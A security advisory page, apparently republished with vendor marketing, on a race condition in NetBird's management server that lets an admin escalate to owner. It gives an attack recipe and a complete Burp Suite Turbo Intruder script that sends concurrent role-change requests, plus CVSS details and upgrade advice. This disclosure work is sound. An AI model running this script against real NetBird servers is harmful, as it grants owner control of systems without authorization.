GHSA-RXMP-8H9V-56CX

GHSA-RXMP-8H9V-56CX is a medium-severity race condition vulnerability in github.com/netbirdio/netbird (go), affecting versions <= 0.65.2. It is fixed in 0.65.3.

Summary

A race condition vulnerability allows authenticated admin-privileged users to escalate to owner privilege.

Details

The vulnerability exists in the updateUser function, which is connected to the /users/{userId} PUT request. This function then calls the SaveOrAddUsers function, which checks the user's permissions on two separate occasions. The first check verifies whether the initiator is an admin or owner and rejects the request if the initiator is not. The second check retrieves the user role details from the database again and saves them in a variable called initiatorUser.

SaveOrAddUsers Function

Location: netbird/management/server/user.go, Line 556

Afterwards, the validateUserUpdate function is called, which checks if the initiator has permission to update that specific user's role. This validation is lacking, as it assumes the initiator is an admin or owner. In the case that the initiator is a regular user, these conditions do not apply, and the target can be updated to owner even when the initiator holds only a user role.

validateUserUpdate Function

Location: netbird/management/server/user.go, Line 862

In summary, if the initiator's permission is admin at the first check and gets dropped to user at the second check, the initiator can update a user to owner.

Proof of Concept

It is possible to create the following attack:

The initiator (old_admin) creates two different accounts, one with a user role and another with an admin role. These will be referred to as new_user and new_admin from here on.

Two different requests are needed:

  1. Request 1, Using new_admin's JWT, a request is created that changes old_admin's role to user.
  2. Request 2, Using old_admin's JWT, a request is created that changes new_user's role to owner.

Both requests need valid user IDs and auto_groups group IDs. They should be sent simultaneously without waiting for prior requests to return.

There is a very small time gap between the first and second permission checks, so multiple tries and multiple copies of the requests may be needed. During a penetration test engagement, privilege escalation was achieved by using 5 copies of Request 1 and 100 copies of Request 2 without waiting for any request to complete. The request that updated the role to owner returned 500 status codes instead of 403, which when retried returned 200 and successfully applied the update.

The following Burp Suite race condition script was used. Note that it may still require multiple tries, and the old_admin account role must be reset to admin after every failed attempt.

import time

def queueRequests(target, wordlists):

    engine = RequestEngine(
        endpoint=target.endpoint,
        concurrentConnections=100,
        requestsPerConnection=100,
        pipeline=False
    )

    # Request 1
    req1 = """PUT /api/users/{OLD_ADMIN_USERID} HTTP/2
Host: CHANGE_WITH_HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {NEW_ADMIN_TOKEN}
Content-Length: 73
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"role":"user","auto_groups":[GROUP_ID],"is_blocked":false}"""

    # Request 2
    req2 = """PUT /api/users/{NEW_USER_USERID} HTTP/2
Host: CHANGE_WITH_HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {OLD_ADMIN_TOKEN}
Content-Length: 52
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"role":"owner","auto_groups":[],"is_blocked":false}"""

    # Send first request
    engine.queue(req1)
    engine.queue(req1)
    engine.queue(req1)
    engine.queue(req1)
    engine.queue(req1)

    # Send second request
    for i in range(100):
        engine.queue(req2)


def handleResponse(req, interesting):
    table.add(req)

Impact

An attacker with an admin account on the self-hosted NetBird management application v0.65.2 or lower can escalate to owner privileges.

Multiple concurrent operations access a shared resource without proper synchronization, producing unpredictable results depending on timing. Typical impact: TOCTOU exploits, data corruption, or privilege escalation.

GHSA-RXMP-8H9V-56CX has a CVSS score of 4.4 (Medium). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.65.3); upgrading removes the vulnerable code path.

Affected versions

github.com/netbirdio/netbird (<= 0.65.2)

Security releases

github.com/netbirdio/netbird → 0.65.3 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade github.com/netbirdio/netbird to 0.65.3 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-RXMP-8H9V-56CX? GHSA-RXMP-8H9V-56CX is a medium-severity race condition vulnerability in github.com/netbirdio/netbird (go), affecting versions <= 0.65.2. It is fixed in 0.65.3. Multiple concurrent operations access a shared resource without proper synchronization, producing unpredictable results depending on timing.
  2. How severe is GHSA-RXMP-8H9V-56CX? GHSA-RXMP-8H9V-56CX has a CVSS score of 4.4 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/netbirdio/netbird are affected by GHSA-RXMP-8H9V-56CX? github.com/netbirdio/netbird (go) versions <= 0.65.2 is affected.
  4. Is there a fix for GHSA-RXMP-8H9V-56CX? Yes. GHSA-RXMP-8H9V-56CX is fixed in 0.65.3. Upgrade to this version or later.
  5. Is GHSA-RXMP-8H9V-56CX exploitable, and should I be worried? Whether GHSA-RXMP-8H9V-56CX is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-RXMP-8H9V-56CX is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-RXMP-8H9V-56CX? Upgrade github.com/netbirdio/netbird to 0.65.3 or later.

Other vulnerabilities in github.com/netbirdio/netbird

CVE-2025-10678CVE-2024-41260

Stop the waste.
Protect your environment with Kodem.